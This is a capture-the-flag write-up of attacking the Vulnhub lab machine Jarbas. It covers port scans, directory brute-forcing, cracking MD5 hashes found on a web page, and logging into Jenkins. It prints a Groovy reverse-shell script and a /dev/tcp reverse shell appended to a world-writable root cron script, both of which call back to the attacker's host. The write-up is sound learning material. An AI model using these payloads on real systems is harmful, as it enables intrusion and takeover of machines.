Jarbas: 1

Got bored, decided to edit and publish an old write-up. I’m going to play with a Vulnhub machine called Jarbas.

• Name: Jarbas: 1
• Date release: 3 Apr 2018
• Author: Tiago Tavares
• Series: Jarbas

Right before launching the virtual machine I changed the network adapter to a host-only network. So I ran a scan to find the target.

Going on, starting the enumeration process.

 ⚡ root@rocinante  .../vulnhub/jarbas  nmap -p- -sT -sU --min-rate 5000 -oA nmap-jarbas 192.168.195.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 22:49 -03
Warning: 192.168.195.130 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.195.130
Host is up (0.0010s latency).
Not shown: 65681 closed ports, 65385 open|filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:36:F5:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 147.81 seconds

Now running the common scripts in the found open ports. While this is running I open a new terminal and scan the port 80 with nikto.

 ⚡ root@rocinante  .../vulnhub/jarbas  nmap -p T:22,80,3306,8080,U:33848 -sC -sV -oA nmap-sC-jarbas 192.168.195.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 22:50 -03
Nmap scan report for 192.168.195.130
Host is up (0.00062s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:36:F5:29 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

 ⚡ root@rocinante  .../vulnhub/jarbas  nikto -h http://192.168.195.130 -output nikto-jarbas.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.195.130
+ Target Hostname:    192.168.195.130
+ Target Port:        80
+ Start Time:         2020-07-21 22:54:11 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) PHP/5.4.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-07-21 22:55:15 (GMT-3) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Well, the second nmap brought me more info than the nikto scan. Let me take a look at that page and see what is being served.

Feels old man. I check the site a bit and it doesn’t seems to work at all. Likely a decoy or rabbit hole. Before moving on to the port 8080 I decided to check for any other directory that would be accessible here. I spent some time trying different lists and was achieving a big zero when I decided to restart and go for files instead of just directories. Began with a small list and …

 ⚡ root@rocinante  .../vulnhub/jarbas  gobuster dir -u http://192.168.195.130 -w /usr/share/dirb/wordlists/common.txt -t 20 -x .html,.php,.txt -o gobuster-commom-jarbas.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.195.130
[+] Threads:        20
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2020/07/21 22:56:35 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/access.html (Status: 200)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/cgi-bin/.html (Status: 403)
/index.html (Status: 200)
/index.html (Status: 200)
===============================================================
2020/07/21 22:56:38 Finished
===============================================================

What’s that access.html page?

Geoffrey Butler! Serving some nice but super safely encrypted credentials.
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

 ⚡ root@rocinante  ~/.../vulnhub/jarbas  hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 5978a63b4654c73c60fa24f836386d87

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

It’s time to check in one of those many MD5 sites around if those hashes were cracked before. And of course they were.
5978a63b4654c73c60fa24f836386d87:italia99
f463f63616cb3f1e81ce46b39f882fd5:marianna
9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu

Before I move forward, let me see if these credentials are working on that port 22.

 ⚡ root@rocinante  .../vulnhub/jarbas  hydra -C credentials-jarbas.txt ssh://192.168.195.130:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries, ~1 try per task
[DATA] attacking ssh://192.168.195.130:22/
1 of 1 target completed, 0 valid passwords found

Not that I was wishing for them to work. That seems to be nowhere else to go to in the port 80. I’ll start poking into that port 8080.

The butler’s convention virtual machine. Since I already have some sweet credentials ready, I’ll give them a shot here while I do some more scanning using nikto on port 8080.
Third time’s a charm! Said someone who has failed at something twice. I’m logged but I don’t know what I’m supposed to do. Never dabbled with Jenkins before. The only solution possible: look for jenkins+exploit.

First result was exactly what I needed:

Exploiting Jenkins Groovy Script Console in Multiple Ways

That nikto running on port 8080 turned out to be useless but while it ran I learned about the Jenkins Script Console. I can go through the Metasploit way… or I can try harder™. That article is already pointing out a reverse shell to use with the script console anyway.

I would like to say that as soon as I glanced my eyes over the script I noticed what I have to change (besides the IP and port) but the truth is I had to run it like three times and also a ping to check the TLS values just to figure out this isn’t a Windows box, the nmap showed it is a CentOS so cmd.exe would never work. I switched to /bin/bash/ …

String host="192.168.195.128";
int port=8021;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

… set a netcat …

 ⚡ root@rocinante  .../vulnhub/jarbas  nc -lvp 8021
listening on [any] 8021 ...

… run the jewels script and whoomp, there it is!

192.168.195.130: inverse host lookup failed: Unknown host
connect to [192.168.195.128] from (UNKNOWN) [192.168.195.130] 55702

Now for some sort of better shell:

python -c 'import pty; pty.spawn("/bin/sh")'

Low user, not allowed to write in any directory, not much to do, then I checked the crontab.

Heeeey, look at this.

bash-4.2$ ls -lrt /etc/script/CleaningScript.sh
ls -lrt /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 50 Apr  1  2018 /etc/script/CleaningScript.sh

So this script is run by root, but can be writen by anyone, which means root will do whatever I what every five minutes. That’s nice, let me just check this thing here quickly

bash-4.2$ echo -n "cat /root/flag.txt >/tmp/chillibowl" >>/etc/script/CleaningScript.sh
<t/flag.txt >/tmp/chillibowl" >>/etc/script/CleaningScript.sh

bash-4.2$ ls -lrt /etc/script/CleaningScript.sh
ls -lrt /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 82 Jul 21 23:35 /etc/script/CleaningScript.sh

Simply to make easy things complicated, a script to countdown these endless 5 minutes and check if the file was created.

bash-4.2$ for i in `seq 300 -1 1` ; do echo -ne "r$i " ; sleep 1 ; done ; ls -l /tmp/chillibowl
ls -l /tmp/chillibowl
-rw-r--r--. 1 root root 156 Jul 21 23:40 /tmp/chillibowl

So I got it, yay! Kinda. I still want to escalate privilege and I think another reverse shell will do just fine.

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.195.128/8021 0>&1 " >> /etc/script/CleaningScript.sh

All set, I close the jenkis shell, open nc again and patiently wait…

⚡ root@rocinante  .../vulnhub/jarbas  nc -lvp 8021
listening on [any] 8021 ...
192.168.195.130: inverse host lookup failed: Unknown host
connect to [192.168.195.128] from (UNKNOWN) [192.168.195.130] 51260
bash: no job control in this shell
[root@jarbas ~]#

You’re such a hacker!